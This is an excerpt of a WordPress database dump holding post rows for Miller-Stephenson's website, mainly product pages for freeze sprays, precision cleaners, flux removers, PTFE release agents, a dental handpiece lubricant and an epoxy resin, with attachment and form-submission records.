INSERT INTO `wp_posts` VALUES (2791, 123, '2016-10-27 13:54:50', '2016-10-27 13:54:50', '', '', '', 'publish', 'closed', 'closed', '', '2791', '', '', '2016-10-27 13:54:50', '2016-10-27 13:54:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/2791/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2792, 0, '2016-10-27 13:56:35', '2016-10-27 13:56:35', '', '', '', 'publish', 'closed', 'closed', '', '2792', '', '', '2016-10-27 13:56:35', '2016-10-27 13:56:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/2792/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2793, 0, '2016-10-27 14:21:13', '2016-10-27 14:21:13', '', '', '', 'publish', 'closed', 'closed', '', '2793', '', '', '2016-10-27 14:21:13', '2016-10-27 14:21:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/2793/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2794, 124, '2016-10-27 14:23:35', '2016-10-27 14:23:35', '', '', '', 'publish', 'closed', 'closed', '', '2794', '', '', '2016-10-27 14:23:35', '2016-10-27 14:23:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/2794/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2795, 2, '2016-10-27 14:56:12', '2016-10-27 14:56:12', '<h1><strong>MS-242L-AS Quik-Freeze® Antistatic Ultra</strong></h1>\r\nMiller-Stephenson’s Quik-Freeze® Antistatic Ultra is designed for convenient use in many industrial applications. It contains HFO 1234ze propellant that has an ultra-low Global Warming. It provides a rapid method of cooling small electronic components. MS-242L-AS is utilized to locate intermittent malfunctions in electronic equipment. Applying the Quik-Freeze® Ultra will have no effect on components operating properly but faulty components will be shocked into failure mode and immediately identified. MS-242L-AS freezes small areas to -50°F (-45°C).\r\n\r\n<strong>Quik-Freeze® Antistatic Ultra is recommended for:</strong>\r\n<ul>\r\n 	<li>Heat-cold intermittence testing of electronic components.</li>\r\n 	<li>Protection of expensive components during soldering/desoldering.</li>\r\n 	<li>Low temperature circuit testing.</li>\r\n 	<li>Nondestructive testing of electronic and electromechanical systems.</li>\r\n 	<li>Shrink fit assembly</li>\r\n</ul>\r\n<strong>ADVANTAGES</strong>\r\n<ul>\r\n 	<li>Ultra-Low Global Warming Potential</li>\r\n 	<li>Nonconductive</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n<strong>PHYSICAL PROPERTIES OF HFO 1234ze</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Molecular Weight</td>\r\n<td style="text-align: center;" width="206">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">-2°F/-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor pressure (mmHg)</td>\r\n<td style="text-align: center;" width="206">60.8 psia @ 68°F/20°C           159.5 psia @129.9°F/54.4°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.17 @ 70°F/21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'MS-242L-AS Quik-Freeze® Antistatic Ultra', 'Miller-Stephenson’s Quik-Freeze® Antistatic Ultra is designed for convenient use in many industrial applications. It contains HFO 1234ze propellant that has an ultra-low Global Warming.\r\n<br/><br/>\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'ms-242l-quik-freeze-antistatic-ultra', '', '', '2016-10-27 14:59:08', '2016-10-27 14:59:08', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2795', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2796, 2, '2016-10-27 14:55:21', '2016-10-27 14:55:21', '', 'MS-242L-AS', '', 'inherit', 'closed', 'closed', '', 'shutterstock_377797663', '', '', '2016-10-27 14:57:54', '2016-10-27 14:57:54', '', 2795, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_377797663.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2797, 2, '2016-10-27 15:14:37', '0000-00-00 00:00:00', '<h1><strong>MS-720L Precision Cleaning Agent</strong></h1>\nA precision cleaning solvent that safety and quickly cleans electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Removes oils, oxidation, and operating erosion\ndust. Safe for plastics including polycarbonate and ABS. Safe for most elastomers and metals including zinc and magnesium.\n\n<strong>ADVANTAGES</strong>\n<ul>\n 	<li>Ultra-Low Global Warming Potential</li>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Safe for most plastics, electronics and metals</li>\n 	<li>RoHS compliant</li>\n</ul>\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Boiling Point</td>\n<td style="text-align: center;" width="206">70°F/21°C</td>\n</tr>\n<tr>\n<td>Density</td>\n<td style="text-align: center;">1.17 g/ml @ 54°F/12°C</td>\n</tr>\n<tr>\n<td>VOC Content</td>\n<td style="text-align: center;">140 g/liter</td>\n</tr>\n<tr>\n<td>Global Warming Potential</td>\n<td style="text-align: center;">5.9</td>\n</tr>\n<tr>\n<td>Ozone Depletion Potential</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>VOC Content</td>\n<td style="text-align: center;">128 g/l</td>\n</tr>\n</tbody>\n</table>\n<strong>PLASTIC COMPATIBILITY</strong>\n(Immersion: 2 weeks)\n<ul>\n 	<li>ABS</li>\n 	<li>D Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>PTFE</li>\n 	<li>PVD</li>\n 	<li>Nylon 66</li>\n 	<li>ACETAL</li>\n 	<li>Polycarbonate</li>\n 	<li>PET</li>\n 	<li>PVC</li>\n</ul>\n<strong>ELASTOMER COMPATIBILITY</strong>\n(Immersion: 2 weeks)\n<ul>\n 	<li>Butyl Rubber</li>\n 	<li>Natural Rubber</li>\n 	<li>Viton™ B</li>\n 	<li>Neoprene</li>\n</ul>\n<strong>METAL COMPATIBILITY</strong>\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Carbon Steel</li>\n 	<li>Stainless Steel</li>\n 	<li>Brass</li>\n 	<li>Zinc</li>\n</ul>', 'MS-720L', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-10-27 15:14:37', '2016-10-27 15:14:37', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2797', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2798, 0, '2016-10-27 15:16:41', '2016-10-27 15:16:41', '', '', '', 'publish', 'closed', 'closed', '', '2798', '', '', '2016-10-27 15:16:41', '2016-10-27 15:16:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/2798/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2799, 2, '2016-10-27 15:18:42', '2016-10-27 15:18:42', '<h1><strong>MS-720L Precision Cleaning Agent</strong></h1>\nA precision cleaning solvent that safety and quickly cleans electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Removes oils, oxidation, and operating erosion\ndust. Safe for plastics including polycarbonate and ABS. Safe for most elastomers and metals including zinc and magnesium.\n\n<strong>ADVANTAGES</strong>\n<ul>\n 	<li>Ultra-Low Global Warming Potential</li>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Safe for most plastics, electronics and metals</li>\n 	<li>RoHS compliant</li>\n</ul>\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Boiling Point</td>\n<td style="text-align: center;" width="206">70°F/21°C</td>\n</tr>\n<tr>\n<td>Density</td>\n<td style="text-align: center;">1.17 g/ml @ 54°F/12°C</td>\n</tr>\n<tr>\n<td>VOC Content</td>\n<td style="text-align: center;">140 g/liter</td>\n</tr>\n<tr>\n<td>Global Warming Potential</td>\n<td style="text-align: center;">5.9</td>\n</tr>\n<tr>\n<td>Ozone Depletion Potential</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>VOC Content</td>\n<td style="text-align: center;">128 g/l</td>\n</tr>\n</tbody>\n</table>\n<strong>PLASTIC COMPATIBILITY</strong>\n(Immersion: 2 weeks)\n<ul>\n 	<li>ABS</li>\n 	<li>D Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>PTFE</li>\n 	<li>PVD</li>\n 	<li>Nylon 66</li>\n 	<li>ACETAL</li>\n 	<li>Polycarbonate</li>\n 	<li>PET</li>\n 	<li>PVC</li>\n</ul>\n<strong>ELASTOMER COMPATIBILITY</strong>\n(Immersion: 2 weeks)\n<ul>\n 	<li>Butyl Rubber</li>\n 	<li>Natural Rubber</li>\n 	<li>Viton™ B</li>\n 	<li>Neoprene</li>\n</ul>\n<strong>METAL COMPATIBILITY</strong>\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Carbon Steel</li>\n 	<li>Stainless Steel</li>\n 	<li>Brass</li>\n 	<li>Zinc</li>\n</ul>', 'MS-720L', '<strong>Ideal for Light Contaminants and Oils.</strong>\n<br/><br/>\n\nAn ultra low global warming precision cleaning solvent that safely and quickly cleans electronic components, circuits, precision instruments, switches and relays. Removes oils, oxidation and operating erosion dust. Safe for most plastics, elastomers and metals. Leaves no residue.\n\n\n<img class="size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'inherit', 'closed', 'closed', '', '1707-autosave-v1', '', '', '2016-10-27 15:18:42', '2016-10-27 15:18:42', '', 1707, 'https://www.miller-stephenson.com/1707-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2800, 2, '2016-10-27 15:49:38', '2016-10-27 15:49:38', '<h1><strong>MS-730L Contact Re-Nu®</strong></h1>\r\nContact Re-Nu® is a low global warming formulation. It is an odorless cleaning agent that restores electrical and mechanical continuity to all types of contacts including: connectors, relays, tuners, encoders, slide wires, rheostats, distribution panels, servomechanisms and switching devices. It is plastic safe.\r\n\r\n<strong>ADVANTAGES</strong>\r\n<ul>\r\n 	<li>Ultra Low Global Warming Potential</li>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, elastomers and metals</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>\r\n<strong>PROPERTIES OF SOLVENT</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Boiling Point</td>\r\n<td style="text-align: center;" width="206">70°F/21°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.17 g/ml @ 54°F/12°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC Content</td>\r\n<td style="text-align: center;">140 g/liter</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming Potential</td>\r\n<td style="text-align: center;">5.9</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>PLASTIC COMPATIBILITY</strong>\r\n(Immersion: 2 weeks)\r\n<ul>\r\n 	<li>ABS</li>\r\n 	<li>HD Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>PTFE</li>\r\n 	<li>PVD</li>\r\n 	<li>Nylon 66</li>\r\n 	<li>ACETAL</li>\r\n 	<li>Polycarbonate</li>\r\n 	<li>PET</li>\r\n 	<li>PVC</li>\r\n</ul>\r\n<strong>ELASTOMER COMPATIBILITY</strong>\r\n(Immersion: 2 weeks)\r\n<ul>\r\n 	<li>Butyl Rubber</li>\r\n 	<li>Natural Rubber</li>\r\n 	<li>Viton™B</li>\r\n 	<li>Neoprene</li>\r\n</ul>\r\n<strong>METAL COMPATIBILITY</strong>\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Carbon Steel</li>\r\n 	<li>Stainless Steel</li>\r\n 	<li>Brass</li>\r\n 	<li>Zinc</li>\r\n</ul>\r\nNote: Test for compatibility before use.', 'MS-730L Contact Re-Nu®', 'Contact Re-Nu® is a low global warming formulation. It is an odorless cleaning agent that restores electrical and mechanical continuity to all types of contacts including: connectors, relays, tuners, encoders, slide wires, rheostats, distribution panels, servomechanisms and switching devices.\r\n<br/><br/>\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'ms-730l-contact-re-nu', '', '', '2016-10-27 15:49:38', '2016-10-27 15:49:38', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2800', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2801, 2, '2016-10-27 15:46:33', '2016-10-27 15:46:33', '', 'shutterstock_249558610', '', 'inherit', 'closed', 'closed', '', 'shutterstock_249558610', '', '', '2016-10-27 15:46:33', '2016-10-27 15:46:33', '', 2800, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_249558610.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2802, 2, '2016-10-27 15:47:56', '2016-10-27 15:47:56', '', 'ms-730l-contact-re-nu', '', 'inherit', 'closed', 'closed', '', 'shutterstock_486488371', '', '', '2016-10-27 15:48:17', '2016-10-27 15:48:17', '', 2800, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_486488371.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2803, 2, '2017-04-09 05:48:03', '2017-04-09 05:48:03', '<h3><strong>MS-755L Heavy Duty Solvent &amp; Flux Remover</strong></h3>\nMS-755L is a low global warming formulation heavy duty solvent and flux remover. It is a strong cleaning agent ideally suited for removal of rosin, organic flux, oils, grease and waxes. It can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces n-PB and HCFC-225 in many applications.\n<h4><strong>ADVANTAGES OF MILLER-STEPHENSON FLUX REMOVERS</strong></h4>\n<ul>\n 	<li>Ultra Low Global Warming Potential</li>\n 	<li>Evaporates quickly</li>\n 	<li>Leaves no residue</li>\n 	<li>Safe for most plastics, <span style="font-size: 14.4px;">elastomers </span>and metals</li>\n 	<li><a href="http://www.rohsguide.com/">RoHS Compliant</a></li>\n</ul>\n<strong>PROPERTIES OF SOLVENT</strong>\n<table width="456">\n<tbody>\n<tr>\n<td width="250">Boiling Point</td>\n<td style="text-align: center;" width="206">90°F/32°C</td>\n</tr>\n<tr>\n<td>Liquid Density</td>\n<td style="text-align: center;">1.20 g/ml @ 77°F/25°C</td>\n</tr>\n<tr>\n<td>Ozone Depletion</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>Global Warming Potential</td>\n<td style="text-align: center;">1.8</td>\n</tr>\n<tr>\n<td>VOC Content</td>\n<td style="text-align: center;">514 g/l</td>\n</tr>\n</tbody>\n</table>\n<strong>PLASTIC COMPATIBILITY</strong>\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Acetal</li>\n 	<li>Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>Liquid Crystal Polymer</li>\n 	<li>Polyester, PBT, PET</li>\n 	<li>Epoxy</li>\n 	<li>Polysulfone, PSO</li>\n 	<li>PEK, PEEK</li>\n 	<li>Polyimides</li>\n 	<li>Teflon™</li>\n 	<li>PTFE</li>\n 	<li>Phenolic</li>\n 	<li>Polyvinylchloride</li>\n</ul>\n<strong>ELASTOMER COMPATIBILITY</strong>\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Butyl Rubber*</li>\n 	<li>Natural Rubber</li>\n 	<li>Polysulfide</li>\n 	<li>EPDM</li>\n 	<li>Buna S*</li>\n 	<li>Buna N</li>\n 	<li>Neoprene*</li>\n 	<li>Urethane</li>\n 	<li>Chlorosuflonated PE</li>\n 	<li>Silicone</li>\n 	<li>Fluoroelastomers</li>\n</ul>\n*Swelling, but with low extractables.\n\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after airdrying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and\ncuring used in the manufacture of the elastomers. Test for compatibility before use.\n\n<strong>METAL COMPATIBILITY</strong>\n(Immersion: 2 weeks at 248°F/120°C)\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Iron</li>\n</ul>\nNote: Test for compatibility before use.\n\nTo learn more about Flux Removers contact us at support@mschem.com or call us.', 'MS-755L Flux Remover', '<strong>Removes Organic Flux, Oils, Grease and Wax.</strong>\n<br/><br/>\nOur most aggressive cleaning agent for flux removal and heavy duty cleaning. It is suitable for removing ionic salts, organics flux, heavy industrial soils, wax and heavy grease. Evaporates quickly and leaves no residue. Low GWP (global warming potential).\n<br/><br/>\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'inherit', 'closed', 'closed', '', '1690-autosave-v1', '', '', '2017-04-09 05:48:03', '2017-04-09 05:48:03', '', 1690, 'https://www.miller-stephenson.com/1690-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2804, 0, '2016-10-27 17:38:35', '2016-10-27 17:38:35', '', '', '', 'publish', 'closed', 'closed', '', '2804', '', '', '2016-10-27 17:38:35', '2016-10-27 17:38:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/2804/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2805, 0, '2016-10-27 19:40:44', '2016-10-27 19:40:44', '', '', '', 'publish', 'closed', 'closed', '', '2805', '', '', '2016-10-27 19:40:44', '2016-10-27 19:40:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2805/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2806, 0, '2016-10-28 02:18:15', '2016-10-28 02:18:15', '', '', '', 'publish', 'closed', 'closed', '', '2806', '', '', '2016-10-28 02:18:15', '2016-10-28 02:18:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/2806/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2807, 2, '2016-10-28 12:05:23', '2016-10-28 12:05:23', 'MS-122AD was developed as an efficient, economical and universal dry film PTFE release agent / dry lubricant. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications.  A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122AD offers the following benefits:\n<ul>\n 	<li>Cost-effective release of molded parts</li>\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. </span>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Production engineers will typically choose Dry film PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span></p>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.</span></p>\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>\n\n&nbsp;', 'MS-122AD', 'MS-122AD was developed as an efficient, economical and universal release agent and dry lubricant. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications.  A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122AD offers the following benefits:\n<ul>\n 	<li><strong>As a Release Agent: </strong>Highly effective when applied to rubber molds. Provides a very uniform, thin coating, ideal for routine mold release operations.</li>\n 	<li><strong>As a Dry Lubricant: </strong>Our best dry lubricant, for all applications; may be used on all surfaces, especially where there is metal on metal contact. Provides elimination of "slip-stick" and low coefficient of friction.</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1677-autosave-v1', '', '', '2016-10-28 12:05:23', '2016-10-28 12:05:23', '', 1677, 'https://www.miller-stephenson.com/1677-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2809, 0, '2016-10-28 15:21:32', '2016-10-28 15:21:32', '', '', '', 'publish', 'closed', 'closed', '', '2809', '', '', '2016-10-28 15:21:32', '2016-10-28 15:21:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/2809/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2810, 0, '2016-10-28 15:25:38', '2016-10-28 15:25:38', '', '', '', 'publish', 'closed', 'closed', '', '2810', '', '', '2016-10-28 15:25:38', '2016-10-28 15:25:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/2810/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2811, 0, '2016-10-28 17:27:54', '2016-10-28 17:27:54', '', '', '', 'publish', 'closed', 'closed', '', '2811', '', '', '2016-10-28 17:27:54', '2016-10-28 17:27:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/2811/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2812, 0, '2016-10-28 17:43:25', '2016-10-28 17:43:25', '', '', '', 'publish', 'closed', 'closed', '', '2812', '', '', '2016-10-28 17:43:25', '2016-10-28 17:43:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/2812/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2813, 127, '2016-10-28 18:20:52', '2016-10-28 18:20:52', '', '', '', 'publish', 'closed', 'closed', '', '2813', '', '', '2016-10-28 18:20:52', '2016-10-28 18:20:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/2813/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2814, 3, '2016-10-28 19:37:48', '2016-10-28 19:37:48', '<h1><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h1>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, <strong><a href="https://www.miller-stephenson.com/product/dental-handpiece-lubricants/">FluoroExtreme™</a></strong>  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\n<a href="https://www.miller-stephenson.com/product/dental-handpiece-lubricants/">FluoroExtreme™</a> is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-28 19:37:48', '2016-10-28 19:37:48', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2815, 3, '2016-10-28 19:50:35', '2016-10-28 19:50:35', '<p class="Section1">EPON Resin 862 (Diglycidyl Ether of Bisphenol F) is a low viscosity, liquid epoxy resin manufactured from epichlorohydrin and Bisphenol-F.  This resin contains no diluents or modifiers.  EPON Resin 862 may be used as the sole epoxy resin or combined with other resins such as EPON Resin 828. When blended with EPON 828, EPON 862 provides a technique to reduce viscosity with no sacrifice in chemical and solvent resistance properties, and the blended resin will exhibit improved crystallization resistance properties when compared to the neat, liquid, Bisphenol-A or Bisphenol-F type resins.  When EPON Resin 862 is cross-linked with appropriate curing agents, superior mechanical, adhesive, electrical and chemical resistance properties can be obtained.</p>\n<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\n\n<div class="Section1">\n<ul>\n 	<li>Solventless or high solids/low VOC maintenance and marine coatings</li>\n 	<li>Chemical resistant tank linings, floorings, and grouts</li>\n 	<li>Fiber reinforced pipes, tanks, and composites</li>\n 	<li>Tooling, casting, and molding compounds</li>\n 	<li>Construction, electrical, and aerospace adhesives</li>\n</ul>\n</div>\n<strong>Benefits</strong>\n<ul>\n 	<li>Low viscosity</li>\n 	<li>Low color</li>\n 	<li>Reacts with a full range of epoxy curatives</li>\n 	<li>Good balance of mechanical, adhesive, and electrical properties</li>\n 	<li>Good chemical resistance</li>\n 	<li>Superior physical properties vs. diluted (6 Poise) resin</li>\n 	<li>Reduced diluent levels to achieve specific viscosity targets</li>\n 	<li>Higher solids or reduced solvent levels for coatings</li>\n 	<li>Improved handling and flow in colder application environments</li>\n 	<li>Improved fiber and filler wetting</li>\n</ul>\n<strong>Safety, Storage &amp; Handling</strong>\n\nPlease refer to the MSDS for the most current Safety and Handling information.\n\nPlease refer to the Hexion web site for Shelf Life and recommended Storage information.\n\nEPON 862 should be stored in tightly sealed containers of metal, glass, or polyolefin plastic at normal room temperatures.  If EPON Resin 862 develops haziness or crystallizes during storage, it can be restored to its original condition by gently warming the container and its contents to approximately 170-190°F until all visual evidence of crystallization is gone.  Upon cooling to normal ambient temperature conditions, the product will regain its original liquid state physical properties.  This process can be repeated as necessary. Exposure to these materials should be minimized and avoided, if feasible, through the observance of proper precautions, use of appropriate engineering controls and proper personal protective clothing and equipment, and adherence to proper handling procedures. <strong>None of these materials should be used, stored, or transported until the handling precautions and recommendations as stated in the Material Safety Data Sheet (MSDS) for these and all other products being used are understood by all persons who will work with them.</strong> Questions and requests for information on EPON products should be directed to your Miller-Stephenson sales representative,', 'EPON™ 862', 'EPON™ Resin 862 (Diglycidyl Ether of Bisphenol F) is a low viscosity, liquid epoxy resin manufactured from epichlorohydrin and Bisphenol-F. This resin contains no diluents or modifiers. EPON Resin 862 may be used as the sole epoxy resin or combined with other resins such as EPON Resin 828. When blended with EPON Resin 828, EPON Resin 862 provides a technique to reduce viscosity with no sacrifice in chemical and solvent resistance properties, and the blended resin will exhibit improved crystallization resistance properties when compared to the neat, liquid, Bisphenol-A or Bisphenol-F type resins. When EPON Resin 862 is cross-linked with appropriate curing agents, superior mechanical, adhesive, electrical and chemical resistance properties can be obtained. Benefits include:\n<ul>\n 	<li>Low viscosity</li>\n 	<li>Low color</li>\n 	<li>Reacts with a full range of epoxy curatives</li>\n 	<li>Good balance of mechanical, adhesive, and electrical properties</li>\n 	<li>Good chemical resistance</li>\n 	<li>Superior physical properties vs. diluted (6 Poise) resins</li>\n</ul>', 'inherit', 'closed', 'closed', 